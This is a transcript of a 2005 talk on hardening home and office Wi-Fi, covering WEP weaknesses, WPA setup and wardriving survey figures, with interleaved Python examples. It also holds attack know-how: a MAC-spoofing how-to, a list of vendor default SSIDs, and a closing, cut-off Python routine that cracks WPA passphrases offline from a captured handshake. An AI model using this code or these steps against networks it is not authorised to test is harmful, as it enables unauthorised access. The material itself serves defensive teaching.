CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. Wireless LAN Insecurity Update 2005. Robert C. Jones, M.D., LtCol, USAF, Medical Corps.

Presentation transcript:

Wireless LAN Insecurity Update 2005. Robert C. Jones, M.D., LtCol, USAF, Medical Corps; Staff Anesthesiologist, Andrews Air Force Base, Maryland. rob--at--notbob.com. Web site:

Disclaimer: Fair Use of Online Resources
- In order to educate health care providers and other professionals, this presentation contains graphics and information obtained on the internet which may be copyrighted.
- According to Sections 107 and 504c of United States Code title 17, this material is considered to be “fair use” of copyrighted intellectual property; it is to be used for non-commercial purposes only.
- “Fair Use” is the use of a copyrighted work for purposes such as criticism, comment, news reporting, teaching (including multiple copies for classroom use), scholarship, or research. In determining whether the use made of a work in any particular case is a fair use, the factors to be considered shall include:
  - The purpose and character of the use, including whether such use is of a commercial nature or is for nonprofit educational purposes;
  - The nature of the copyrighted work;
  - The amount and substantiality of the portion used in relation to the copyrighted work as a whole; and
  - The effect of the use upon the potential market for or value of the copyrighted work.
- The purpose and character of this presentation is for nonprofit educational purposes in support of Homeland Defense and internet security; the nature of the copyrighted work is individual graphics and quotes; the amount and substantiality of the portion used is minimal; and the effect on the potential market for or value of the copyrighted use is negligible. In fact, the hyperlink references crediting the original sources should increase the market value of said copyrighted works by increasing traffic to the websites presenting this material.
- This presentation was produced in the United States Air Force medical environment in the interest of academic freedom and the advancement of national defense-related concepts. The views expressed in this presentation and linked-to material are those of the author(s) of said material and do not reflect the official policy or position of the U.S. Air Force, Department of Defense, the United States government, or the AOMPS. Nor do educational links to internet websites or reference sources constitute any kind or degree of verification or validation of information presented therein. Nobody paid me squat to write this stuff, by the way.
- Point of Contact for questions regarding copyright infringement shall be the current U.S. Department of Defense designated agent to receive notification of claimed DMCA copyright infringement (courtesy of Department of Redundancy Department [DoRD]).
- Financial Disclosure: I am a Microsoft shareholder, so I can parody and provide commentary upon the products and services of the Microsoft Corporation with impunity.
FAIR USE NOTICE: This contains copyrighted material, which is reproduced under the Fair Use Provision of Title 17, U.S.C. Section 107, and is posted for purposes such as criticism, comment, news reporting, teaching, scholarship, or research. This material is posted without profit for the benefit of those who, by accessing this material, are expressing a prior interest in this information for research and educational purposes.


Network Abuse Costs $$$: 2003 Data from U.S. FBI Where’s Wireless???

WLAN Abuse 2004: Number 5 with a Bullet Multiple Winblows XP/2000 vulnerabilities

The Basic Network Security Pyramid (diagram slide)

Wireless Security 2003: Rob’s 2003 WLAN Security Pyramid (diagram slide)


What this talk is about
- Brief Review of Wireless LAN (WLAN) tech
- Wardriving Update Late 2004
- Step 1: Physical Security and Wireless Policy
- Step 2: OS, Firmware Updates; MAC Filtering; SSID
- Step 3: Change AP PW; WPA if possible, else WEP
- Step 4: Toward 802.11i/WPA2 for Home/SOHO use
- Step 5: CSE: OS Updates, Vulnerability News
- Future Wireless Security Topics

Dusko and Vlado Say: Be Responsible with your WLAN-kwon-do! This talk is not a WLAN Cracking HOWTO; this is a HOWNOTTO on getting 0wn3d.

You can’t afford perfect security: “The only secure computer is one that is unplugged, locked in a secure vault that only one person knows the combination to, and that person died last year.” Eckel, G. and Steen, W., Intranet Working, New Riders, 1996, p. 419.

Section: Brief Review of Wireless LAN (WLAN) tech

Introduction to Wireless vs. Wired Networking
- Wired Networking
  - Inexpensive infrastructure (CAT5 cable + NICs)
  - Expensive deployment (drilling through walls)
  - Reconfiguring network topology difficult
  - Difficult (not impossible!) to intercept communication
  - Worldwide exposure to intruders if connected to Net
  - Fast! (10/100 Mbps Ethernet → Gigabit Ethernet…)
  - Negligible interference from environment

Basic Wired Network Topology: Router, Firewall (diagram slide)

Introduction to Wireless vs. Wired Networking (cont’d)
- Wireless Networking
  - Expensive infrastructure (clients + APs = cha-ching!)
  - Inexpensive deployment (protocols supported in OSes)
  - Reconfiguring network topology trivial (too trivial?)
  - Ridiculously easy to intercept communication
  - Geographically constrained exposure to intruders*
  - Relatively slow (“11 Mbps” marketingspeak = 5 Mbps)
  - Massive environmental interference (ISM, path loss)
*ad hoc intranetworks

Quick Review of WLAN Security Terminology
- SSID (ESSID): Service Set Identifier = name for WLAN network; sent out as plain text in every packet; broadcast by default by most access points
- AP: Access point: WLAN “router” that talks to client cards
- WEP: Wired Equivalent Protocol; broken and easily crackable encryption scheme; not “Wired Equivalent Privacy”, et al.
- MAC: Unique Media Access Control ID number hard-coded into every networking device; spoofable via software
- WPA: Upgrade to WEP security; uses TKIP to rotate encryption keys for each packet and generate different keys for each computer
- 802.1x (not to be confused with 802.11x): User authentication mechanism using EAP protocol; separate from encryption
- 802.11i/WPA2: Major upgrade to security; uses new AES crypto algorithm vs. RC4; part of RSN: Robust Security Network. TSN = transitional security network with RSN + TKIP instead of CCMP with AES; more on this later

Basic Wireless Network Topology: Infrastructure Mode (using AP) (diagram slide: Firewall, Access Point). Advantages: AP security; isolated net connection. Disadvantages: AP cost, complexity; broadcast range.

Basic Wireless Network Topology: P2P Ad Hoc Networks (diagram slide: Firewall). Advantages: no add’l hardware; geographically constrained. Disadvantages: unmanaged P2P net issues; geographically constrained.

Authentication
- Default: Open authentication (+/- MAC/SSID filtering)
- Shared Key Auth (WEP, WPA PSK)
(diagram: open authentication is “give me access” → “granted”; shared key authentication is “give me access” → authentication challenge → authentication response → “granted”)

Generic Wireless Security Exploits
- Physical Theft
- Eavesdropping
- Data Modification
- Identity Spoofing/Masquerading
- Denial of Service (DoS)
- Theft of Internet Service
- Injection of Bad Things via Wireless
- WLAN as new modem (network soft spot)

Generic Wireless Network Exploits: Physical Theft (Before) (diagram slide: Firewall, Access Point)

Generic Wireless Network Exploits: Physical Theft (After) (diagram slide: Firewall, Access Point)

Generic Wireless Network Exploits: Eavesdropping Case 1: Wardriving (diagram slide: Firewall, Access Point; “Gotcha!”)

Generic Wireless Network Exploits: Eavesdropping Case 2: Office Building (diagram slide: Firewall, Access Point; neighbors labeled Your Competitor, Tabloid, Terrorist)

Generic Wireless Network Exploits: Eavesdropping Case 3: Rogue APs (diagram slide: Firewall, Access Point, Rogue Access Point)

The 100 meter myth
- Increasingly powerful 802.11x clients available
- 200 mW PCMCIA cards advertise a range of (figure lost) ft
- Many WiFi® adapters have external antenna connections; even homemade antennas work well

Generic Wireless Network Exploits: Identity Spoofing (diagram slide: Firewall, Access Point; Alice and Bob with MAC Address 0000deadbeef, SSID default; “Cats” spoofs MAC Address 0000deadbeef, SSID default: looks like your company’s IP to the FBI!)

Generic Wireless Network Exploits: Denial of Service (DoS) (diagram slide: Firewall, Access Point; 2.4 GHz jammer, microwave oven, Bluetooth device, cell phone)

Wild Wild WiFi®: WiFi Hog. “Only traffic originating from the Wifi-Hogger's IP address may access the connection, otherwise the PVJ (portable video jammer) is switched on, blocking others from accessing the open node.” Designed to hijack open (public) nodes; could easily be used to hijack commercial or home access points with inadequate security.

Section: Wardriving Update Late 2004

Wardriving Update late 2004
- Mid Sept 04 (same area wardriven in Sep 03); 30 minute drive
- Residential neighborhoods/business district
- 5 dBi omnidirectional, magnetic, car-mounted antenna
- TCP/IP disabled on card → purposely unable to connect/get IP address (thus legal)
- 126 APs located; 1 Peer located
- 97 APs with no security (77%)
- Of 30 with security, only 13 (43%) 802.11g (likely WPA compliant out of box)
- 62 APs with default SSID bespeaking ignorant owners (49%)
- One FAKE-AP (first time: counterfeit AP signals)
- Worldwide Wardrive 4: of 228,537 APs logged, only 61.6% enabled WEP (or better) security; 31.4% used default SSID (note: lots of smart non-Merkins included)

Note! (screenshot callout): Disable TCP/IP on the card prior to wardrive to prevent auto-connection to discovered APs

Section: Step 1: Physical Security and Wireless Policy

Locking It Down: Step 1.1
- Physical Security
  - Secure your laptop/PDA physically
    - Windoze XP stores WPA PW and automagically reconnects on startup
  - BIOS password at least, in case WLAN device is stolen!
  - Secure your access points (locked closets vs. desk)
    - Remember, reset button on back of AP = Poof! No Security
  - Wise placement of APs/directional antennas to minimize RF leak
  - If possible, minimize AP RF power output to least useful
  - Audit your coverage: Warwalk/drive/sit yourself!
Reference:

Locking It Down: Step 1.2
- Wireless Policy
  - (Authority) will be in charge of establishing and enforcing WLAN standards; any implementation that deviates from standard must be approved by (authority)
  - (Authority) will be the only one(s) installing/modifying/maintaining APs; (Users) will not install APs
  - Only (authorized user type list) can use the WLAN; all others require explicit permission from (authority)
  - All WLAN devices must be secured according to standards set by (authority)
  - All communications must be encrypted using (standard)
  - All (users) must register WLAN devices with (authority)
For good example:

Section: Step 2: OS, Firmware Updates; MAC Filtering; SSID

Locking It Down: Step 2.1
- OS/Firmware Updates
  - Windows XP Service Pack 2 (SP2)
    - Until Sep 04, very cumbersome process to implement WPA (see notbob.com)
    - Now, SP2 incorporates new WZC and WPA functionality (finally)
  - Apple Macintosh: Need firmware upgrade to AirPort Extreme 802.11g (802.11b: SOL)
    - “WPA requires an AirPort Extreme base station and AirPort Extreme or AirPort clients running Mac OS X v10.3 (Panther), or later. Use of Wi-Fi Protected Access (WPA) reduces the maximum number of network users. Computers with wireless cards that only support WEP cannot join an AirPort network that has WPA enabled.”
    - Client: (link)
    - AP: (link)
  - Linux: Support depends on chipset; also see (link) for mondo links
  - Make sure you are running latest version of your AP’s firmware; visit manufacturer’s website every few months at least

WPA under WinXP SP1 vs. SP2 (screenshot slide)

MAC/SSID Vulnerability
- MAC = media access control address
  - Hardcoded in all NICs
  - Easily spoofed under Win 9x, Linux; New! WinXP spoofing via freeware Mac Makeup app: (link)
- SSID = Service Set Identifier
  - Used to define networks
  - By default, broadcast in the clear by access points
  - Will be given out by AP if client configured with “any” or blank SSID

MAC Address Spoofing (screenshot: Orinoco Gold on Win 98SE)
Red Hat Linux (quoted how-to): edit /etc/sysconfig/network-scripts/ifcfg-eth0 (assuming it's your eth0 network card that you want to change the MAC for), and add a line like this: MACADDR=AA:BB:CC:DD:EE:FF (Obviously you want to substitute the MAC address you want in place of AA:BB:CC:DD:EE:FF). Then "/sbin/ifdown eth0", "/sbin/ifup eth0", and you should be up and running with the new MAC address. You can use "/sbin/ifconfig eth0" to verify that the new MAC address is in effect -- it shows up in the 'HWaddr' entry on the first line that ifconfig prints (YMMV RTFM HTH)

Locking It Down Step 2.2
- MAC Filtering
  - Better than nothing; will keep out your neighbors
  - To find your adapters’ MAC addresses, under Windows: start | run | cmd | ipconfig /all; listed as Physical Address
  - Best to explicitly allow only your own MACs; explicit deny is for open APs that are subject to annoying users (without the sense to spoof their MAC addys)

Default SSIDs
- 3Com: comcomcom
- Cisco: 2, tsunami, WaveLAN Network
- Compaq: Compaq
- DLink: WLAN
- Intel: 101, 195, xlan, intel
- Linksys: linksys, Wireless
- Netgear: Wireless
- Zcomax: any, mello, Test
With AP manufacturer known, trivial to determine default Administrator username/password!

Locking It Down Step 2.2 (cont’d)
- SSID Rules
  - Change from default
  - Don’t broadcast if possible (WPA flaky sometimes)
  - Don’t make it your family/business name
  - Don’t make it interesting → boring is good: ex: thisAP
  - Make it hard to guess (e.g., not Default1)
(screenshot callout: use this if possible)
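The "audit your coverage" advice, the wardriving statistics and the SSID rules above all reduce to the same check run over a scan of what an access point survey sees. The following is an added example written for this transcript, not code from the original talk: it encodes the Default SSIDs table from the previous slide, flags APs with a factory SSID, no encryption or WEP only, summarises them as percentages the way the wardriving slide does, and applies the SSID Rules checklist to a proposed name. SAMPLE_SCAN is constructed sample data, not survey results, and the function and field names are this example's own.

```python
"""Audit wardrive-style scan results against the slides' checklist.

Added example for this transcript (not code from the original talk).
SAMPLE_SCAN is constructed data; the vendor table is copied from the
"Default SSIDs" slide.
"""
import re

# Vendor -> factory SSIDs (lower-cased), from the "Default SSIDs" slide.
DEFAULT_SSIDS = {
    "3Com": {"comcomcom"},
    "Cisco": {"2", "tsunami", "wavelan network"},
    "Compaq": {"compaq"},
    "DLink": {"wlan"},
    "Intel": {"101", "195", "xlan", "intel"},
    "Linksys": {"linksys", "wireless"},
    "Netgear": {"wireless"},
    "Zcomax": {"any", "mello", "test"},
}

# Constructed scan: (SSID, encryption as reported by the scanner).
SAMPLE_SCAN = [
    ("linksys", "none"),
    ("Wireless", "none"),
    ("tsunami", "wep"),
    ("SmithFamilyNet", "wpa"),
    ("thisAP", "wpa"),
    ("default", "none"),
    ("xlan", "wep"),
    ("clinic-guest", "none"),
    ("k7r2pq", "wpa2"),
    ("Default1", "wep"),
]

# Names like "Default1" that the SSID Rules slide calls easy to guess.
GUESSABLE = re.compile(r"^(default|test|wireless|wlan)\d*$", re.IGNORECASE)


def default_ssid_vendors(ssid):
    """Vendors whose factory SSID matches this SSID (empty set if none).

    A factory SSID advertises the AP brand, and the brand gives away the
    default admin login, so this is the first thing to flag."""
    name = ssid.strip().lower()
    return {vendor for vendor, names in DEFAULT_SSIDS.items() if name in names}


def ssid_problems(ssid, owner_names=()):
    """Apply the SSID Rules checklist; returns the list of violated rules."""
    problems = []
    if default_ssid_vendors(ssid):
        problems.append("default SSID")
    for owner in owner_names:                 # family/business name in SSID
        if owner.lower() in ssid.lower():
            problems.append("identifies owner")
            break
    if len(ssid) < 4 or GUESSABLE.match(ssid):
        problems.append("guessable")
    return problems


def audit(scan):
    """Summarise a scan the way the wardriving slide does (counts and %)."""
    total = len(scan)

    def pct(n):
        return round(100.0 * n / total, 1) if total else 0.0

    open_aps = [s for s, enc in scan if enc == "none"]
    wep_aps = [s for s, enc in scan if enc == "wep"]
    wpa_aps = [s for s, enc in scan if enc in ("wpa", "wpa2")]
    default_aps = [s for s, _ in scan if default_ssid_vendors(s)]
    # Open AND factory SSID: the owner changed nothing at all.
    untouched = [s for s, enc in scan if enc == "none" and default_ssid_vendors(s)]
    return {
        "total": total,
        "open": len(open_aps), "pct_open": pct(len(open_aps)),
        "wep": len(wep_aps), "pct_wep": pct(len(wep_aps)),
        "wpa_or_better": len(wpa_aps),
        "default_ssid": len(default_aps), "pct_default_ssid": pct(len(default_aps)),
        "untouched": untouched,
    }


if __name__ == "__main__":
    for key, value in audit(SAMPLE_SCAN).items():
        print(f"{key}: {value}")
    print("thisAP ->", ssid_problems("thisAP") or "ok")
    print("SmithFamilyNet ->", ssid_problems("SmithFamilyNet", ["Smith"]))
```

Feed it your own scan rather than the constructed list; the "untouched" list (open AND factory SSID) is the set of APs where nothing in Steps 2 and 3 of this talk has been done yet.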

Section: Step 3: Change AP PW; WPA if possible, else WEP

Locking It Down Step 3.1
- Change yer freakin’ default AP password!
  - Every script kiddie and her dog knows the default passwords for major manufacturers! Pick a new, secure PW
  - Disable remote router administration and Universal Plug and Play (if router doesn’t have nice check box, get Steve Gibson’s UnPlug n’ Pray here: (link))
  - While you’re at it, enable router’s firewall function: block anonymous WAN requests & filter NAT redirection to keep local LAN users from accessing port-forwarded services on router

Locking It Down Step 3.2
- Use Encryption

Encryption Basics
- Need to hide message (plaintext) = needle
- Generate random stuff (encryption key) = piece of hay
- Multiply random stuff (keystream) = haystack
- Hide message in haystack (XOR) → needle + haystack (ciphertext)
Intro to Encryption: XOR Logic Gate (diagram)

WEP…what is WEP?
- Wired Equivalent Protocol (NOT Wireless Encryption Privacy)
- First defined in ANSI/IEEE Std 802.11, 1999 edition
- Never intended to provide strong security; Goals:
  - “Reasonably strong” (dependent on key length)
  - “Self-synchronizing” (for “best effort” delivery)
  - “Efficient” (low processor overhead)
  - “Exportable” (pre-1999 ITAR climate [Phil Zimmermann])
  - “Optional” (so lusers don’t whine to hardware manufacturers when they mess up WEP on their networks; DISABLED out of the box by all OEMs as of 2004 AFAIK*)
*AFAIK = As far as I know

How is WEP supposed to work? (diagram slide)
- Secret key combined with IV, run through WEP cipher PRNG (RC4)
- Plaintext XORed with key sequence (irreversible without key)
- Ciphertext output sent over airwaves after encapsulation into IP packets

What is RC4?
- One encryption algorithm (many others: DES, IDEA, Blowfish, AES, etc.)
- Efficient streaming cipher (low overhead); used in SSL encryption (online banking, etc.)
- Proprietary trade secret of RSA Inc.
- Presumed RC4 source code uploaded to Usenet newsgroup sci.crypt 13 Sep 1994…all open source RC4 implementations based on this anonymous post (including WEP)!
From: (An0nYm0Us UsEr)
Newsgroups: sci.crypt
Subject: RC4 ?
Date: 13 Sep 1994 :30:36 GMT
Organization: Global Anonymous Remail Services Ltd.
Lines: 83
Message-ID:
NNTP-Posting-Host: xs1.xs4all.nl
X-Comment: This message did not originate from the above address.
X-Comment: It was automatically remailed by an anonymous mailservice.
X-Comment: Info: Subject: remailer-help
X-Comment: Please report inappropriate use to
SUBJECT: RC4 Source Code
I've tested this. It is compatible with the RC4 object module that comes in the various RSA toolkits.
/* rc4.h */

Why is WEP Broken?
- First paper: Fluhrer, Mantin, Shamir (encryption flaws)
- WEP attack using FMS method: Stubblefield, Ioannidis, Rubin
- WEP standard implements RC4 improperly
- Flaws in key scheduling algorithm
  - Large number of weak keys → encryption easily cracked
- IV is sent in the clear with each chunk; subtract 24 bits of IV from encryption key length

Enabling WEP (screenshot slide: Orinoco Gold on Win 98SE; Linksys pic modified from: (link))

Advanced WEP
- Freeware key generators create pseudorandom keys for you to enter
- Rotate keys frequently (weekly for business, monthly for home at minimum)
- Make sure highest key-length WEP is enabled (remember, 64 bit WEP key is really just 40 bits long [thanks, marketing!])
- Upgrade WEP to WPA as soon as possible (look for WPA support for all new hardware)
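The Encryption Basics, "How is WEP supposed to work", "Why is WEP Broken" and Advanced WEP slides above describe one mechanism: RC4 keystream XORed onto the frame, keyed by a 24-bit IV sent in the clear plus the secret key. The block below is an added example written for this transcript, not code from the original talk or from any 802.11 implementation. It builds RC4 from scratch, wraps it in a WEP-style frame (IV || ciphertext; the CRC-32 ICV and 802.11 headers are left out), and puts numbers on the slides' claims: "64-bit" WEP is 40 secret bits, the IV space is 2^24 frames, and a reused IV means a reused keystream, which is the property key rotation alone cannot fix. The secret key and plaintexts are constructed values.

```python
"""Toy WEP-style framing on a from-scratch RC4, to make the WEP slides concrete.

Added example for this transcript (not code from the original talk).
Omits the CRC-32 ICV and 802.11 headers; key and plaintexts are constructed.
"""
import math

IV_LEN = 3  # the WEP IV is 24 bits and rides in the clear in front of the data


def rc4_keystream(key, n):
    """Return n bytes of RC4 keystream for key (KSA followed by PRGA)."""
    S = list(range(256))
    j = 0
    for i in range(256):                        # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(n):                          # pseudo-random generation
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor_bytes(a, b):
    """Needle into haystack: XOR two equal-length byte strings."""
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(secret_key, iv, plaintext):
    """Frame body = IV (clear) || plaintext XOR RC4(IV || secret_key)."""
    if len(iv) != IV_LEN:
        raise ValueError("WEP IV must be 24 bits")
    keystream = rc4_keystream(iv + secret_key, len(plaintext))
    return iv + xor_bytes(plaintext, keystream)


def wep_decrypt(secret_key, frame):
    """Receiver reads the IV off the front, regenerates the keystream, XORs."""
    iv, body = frame[:IV_LEN], frame[IV_LEN:]
    return xor_bytes(body, rc4_keystream(iv + secret_key, len(body)))


def secret_bits(marketed_bits):
    """'64-bit' / '128-bit' WEP minus the public IV = 40 / 104 secret bits."""
    return marketed_bits - 8 * IV_LEN


def keystream_repeats(secret_key, iv, p1, p2):
    """True when two frames sent under one IV share a keystream: XOR of the
    two ciphertexts then equals XOR of the two plaintexts (the key cancels).
    This is why the 24-bit IV space, not the key length, sets WEP's limit."""
    c1 = wep_encrypt(secret_key, iv, p1)[IV_LEN:]
    c2 = wep_encrypt(secret_key, iv, p2)[IV_LEN:]
    return xor_bytes(c1, c2) == xor_bytes(p1, p2)


def iv_space():
    """Number of distinct IVs a single WEP key can ever use."""
    return 2 ** (8 * IV_LEN)


def expected_frames_until_iv_repeat():
    """Birthday bound: about sqrt(pi*N/2) randomly chosen IVs before a repeat."""
    return math.sqrt(math.pi * iv_space() / 2)


if __name__ == "__main__":
    key = bytes.fromhex("0102030405")           # constructed 40-bit secret
    frame = wep_encrypt(key, b"\x00\x00\x01", b"patient record")
    print("frame:", frame.hex(), "| IV in clear:", frame[:IV_LEN].hex())
    print("round trip:", wep_decrypt(key, frame))
    print("secret bits in '64-bit' WEP:", secret_bits(64))
    print("IV space:", iv_space(), "| frames until a repeat ~",
          round(expected_frames_until_iv_repeat()))
```

The birthday figure (a few thousand frames) is the defender's number: on a busy AP the IV space is exhausted in hours, so the "rotate keys weekly" advice above is the floor, and the real fix is the per-packet key mixing that TKIP and WPA introduce on the following slides.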

Bbbbut…isn’t WEP broken?
- Yes, but…just because your front door can be picked doesn’t mean you shouldn’t lock it!
- Never be low-hanging fruit for attackers
- Lots of old hardware (pre-2004) can’t support WPA, let alone WPA2: WEP is the only option
- If you just enable WEP → more secure than 60-75% of WLAN users (according to wardriving data)
- If you enable WEP + change SSID from default + change AP logon/pw: more secure than 95% of lusers

Quick Fix for WEP: WPA
- WPA = “WiFi™ Protected Access”
- Available as software/firmware upgrade for most chipsets/manufacturers now or soon
- Subset of new (Jun 04) 802.11i security architecture
- Patches major vulnerabilities in WEP:
  - TKIP fixes IV weakness, adds MIC, key mixing, rekeying
  - Supports enterprise user authentication via EAP and 802.1X
  - SOHO mode: Pre-Shared Key (PSK): autorotates key for you

TKIP (diagram slide)

Look for the WPA label… (logo slide)

Enabling WPA PSK in Windoze XP SP2
- Make sure wireless connection works with WEP first
- Have wired connection to prevent disconnection with changes
- Upgrade Windows XP SP1 to SP2 (Windoze Update)
- Pick a good pre-shared key (PSK)!
- Upgrade client firmware to support WPA
- Implement WPA PSK on router (may need to upgrade firmware)
- Implement WPA on Windows XP using WZC (Wireless Zero Configuration)
See my separate step-by-step guide on WPA in XP: (link)

(screenshot slides)
Step 1: Upgrade XP to SP2
Step 2: Implement WPA on AP router
Step 3: Make sure supplicant supports WPA
Step 4: Implement WPA PSK under network connections
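"Pick a good pre-shared key" is the one step in the procedure above that the screenshots cannot do for you, so here is what the AP and the supplicant actually derive from what you type. This is an added example written for this transcript, not code from the original talk or from Windows; the derivation is the one IEEE 802.11i specifies for WPA/WPA2 pre-shared keys (PBKDF2-HMAC-SHA1 with the SSID as salt, 4096 iterations, 256-bit output), and it is checked against the published "password"/"IEEE" test vector. WEAK_PASSPHRASES is a constructed stand-in for a real common-password list, and the checklist thresholds are this example's own.

```python
"""WPA PSK derivation plus a passphrase sanity check for the "pick a good PSK" step.

Added example for this transcript (not code from the original talk).
WEAK_PASSPHRASES is a constructed placeholder list.
"""
import hashlib
import string

WEAK_PASSPHRASES = {"password", "12345678", "passphrase", "linksys"}  # constructed


def wpa_psk(passphrase, ssid):
    """256-bit PSK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).

    This, not the passphrase, is what the AP and the supplicant share; the
    passphrase must be 8 to 63 printable ASCII characters."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrase must be 8 to 63 characters")
    if any(not 32 <= ord(ch) <= 126 for ch in passphrase):
        raise ValueError("WPA passphrase must be printable ASCII")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                               ssid.encode("utf-8"), 4096, dklen=32)


def passphrase_problems(passphrase, ssid):
    """Apply the checklist; returns the reasons the passphrase is not good."""
    problems = []
    if len(passphrase) < 20:
        problems.append("shorter than 20 characters")
    if passphrase.lower() in WEAK_PASSPHRASES:
        problems.append("on a common-password list")
    if ssid and ssid.lower() in passphrase.lower():
        problems.append("contains the SSID")
    classes = sum(any(ch in cls for ch in passphrase)
                  for cls in (string.ascii_lowercase, string.ascii_uppercase,
                              string.digits, string.punctuation))
    if classes < 3:
        problems.append("fewer than 3 character classes")
    return problems


def psk_changes_with_ssid(passphrase, ssid_a, ssid_b):
    """Same passphrase, different SSID -> different PSK, because the SSID is
    the salt. That is why changing the factory SSID matters beyond hiding the
    AP brand: anything precomputed for a default SSID does not carry over."""
    return wpa_psk(passphrase, ssid_a) != wpa_psk(passphrase, ssid_b)


if __name__ == "__main__":
    print("PSK(password, IEEE) =", wpa_psk("password", "IEEE").hex())
    print("problems:", passphrase_problems("password", "IEEE"))
    print("salted by SSID:", psk_changes_with_ssid("password", "linksys", "thisAP"))
```

The 4096-iteration PBKDF2 is what makes each guess cost something, but it is the passphrase length that sets the work factor, which is why the checklist treats anything under 20 characters as a problem.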

Take Home Message
- Everyone in this room should be using WPA instead of WEP at all times, right now!
- Definitely worth upgrading hardware to support WPA
- Hospitals/Medical Offices: legal risk of NOT using WPA (due diligence), given the known WEP vulnerabilities

What this talk is about
- Brief review of Wireless LAN (WLAN) tech
- Wardriving update, late 2004
- Step 1: Physical security and wireless policy
- Step 2: OS and firmware updates; MAC filtering; SSID
- Step 3: Change AP password; WPA if possible, else WEP
- Step 4: Toward 802.11i/WPA2 for home/SOHO use

WPA Upgrade: IEEE 802.11i/WPA2
- 802.1X port-based authentication requires a dedicated authentication server (or a server process in the AP)
- RADIUS authentication: for enterprises only; home/SOHO users get WPA2's AES encryption with a pre-shared key (WPA2-Personal) instead, with no server required
- IEEE 802.11i = WPA + RSN; finally ratified Jun 04
- Uses CCMP (Counter Mode with CBC-MAC Protocol: AES in counter mode for privacy, plus an AES CBC-MAC for data integrity and authentication, replacing RC4 and TKIP's Michael MIC)
- RSN: Robust Security Network = 802.1X + EAP + AES (non-RC4 encryption). Will likely need a hardware upgrade to run RSN without a major hit on throughput (2005-era radios have no AES acceleration); likely available in "mature" form in…

AES

Rijndael (Reign-Dahl) is AES
- Rijndael is a symmetric block cipher, designed by Belgian/Flemish cryptologists Joan Daemen (Yo-ahn Dah-mun) and Vincent Rijmen (Rye-mun)
- Brute-force resistance: at 2^55 keys per second, the expected time to find a 128-bit key (searching half the keyspace, 2^127 keys) is 2^72 seconds, about 149 trillion years
- Basic advantage of AES is its efficiency and low overhead: easier to implement than its competitors in the AES selection process
- For Wi-Fi(R), requires a dedicated chip to process the cipher in real time (on 2005-era APs and cards)
"How is that pronounced? If you're Dutch, Flemish, Indonesian, Surinamer or South-African, it's pronounced like you think it should be. Otherwise, you could pronounce it like "Reign Dahl", "Rain Doll", "Rhine Dahl". We're not picky. As long as you make it sound different from "Region Deal"." (quoted from the Rijndael authors' FAQ)
Official NIST AES Specs:
Intro to AES:
Very High Level AES mathematical explanation:

Do you really need WPA2?
- WPA fixes all known problems with WEP
- If you avoid choosing a weak passphrase subject to dictionary attack, WPA should suffice for most home/SOHO users for now (2005)
- As of Oct 04, WPA has not been broken
- RC4 will eventually succumb to Moore's Law, and TKIP was designed as a stopgap for RC4 hardware; you will need to move to AES in the future (the Wi-Fi Alliance has since deprecated TKIP in favour of CCMP/AES)
- AES support in WPA2 probably involves upgrading your hardware: business decision (risk/benefit ratio)
See Q&A section here:
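WPA-PSK key derivation, showing concretely why the passphrase is the weak point named on this slide and on the XP setup slide ("pick a good pre-shared key"). This is an added example, not code from the original talk: it implements the 802.11i PBKDF2 and PRF-512 derivation and the EAPOL-Key MIC with Python's standard library, and the "captured" handshake (MAC addresses, nonces, EAPOL body) is constructed here rather than sniffed.

```python
"""WPA/WPA2-PSK key derivation and an offline dictionary attack on a captured
4-way handshake. Everything the attacker needs (SSID, both MACs, both nonces,
the EAPOL-Key frame and its MIC) crosses the air in the clear, so the
passphrase is the only secret and can be guessed offline, one PBKDF2 per
candidate. Constructed example: addresses, nonces and EAPOL body are made up.
"""
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits).
    The SSID is the salt: a default SSID lets attackers reuse precomputed tables."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i)."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)  # 4 x 20 bytes covers the 64 bytes needed
    )
    return out[:64]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK from the PMK, the two MAC addresses and the two handshake nonces."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_frame: bytes, wpa2: bool = True) -> bytes:
    """MIC over the EAPOL-Key frame (MIC field zeroed) with KCK = PTK[0:16].
    WPA/TKIP uses HMAC-MD5; WPA2/CCMP uses HMAC-SHA1 truncated to 16 bytes."""
    if wpa2:
        return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]
    return hmac.new(kck, eapol_frame, hashlib.md5).digest()


def crack_psk(candidates, ssid, aa, spa, anonce, snonce, eapol, mic, wpa2=True):
    """Try each candidate passphrase against the captured MIC; return the hit."""
    for cand in candidates:
        pmk = pmk_from_passphrase(cand, ssid)
        kck = derive_ptk(pmk, aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol, wpa2), mic):
            return cand
    return None


def make_capture(passphrase: str, ssid: str, wpa2: bool = True) -> dict:
    """Constructed stand-in for what a sniffer sees of handshake message 2."""
    aa = bytes.fromhex("00a0c9aabbcc")      # AP (authenticator) MAC, made up
    spa = bytes.fromhex("0011d8112233")     # client (supplicant) MAC, made up
    anonce = bytes(range(32))               # real nonces are random
    snonce = bytes(range(32, 64))
    eapol = b"\x01\x03\x00\x75" + bytes(0x75)   # EAPOL-Key body, MIC field zeroed
    kck = derive_ptk(pmk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce)[:16]
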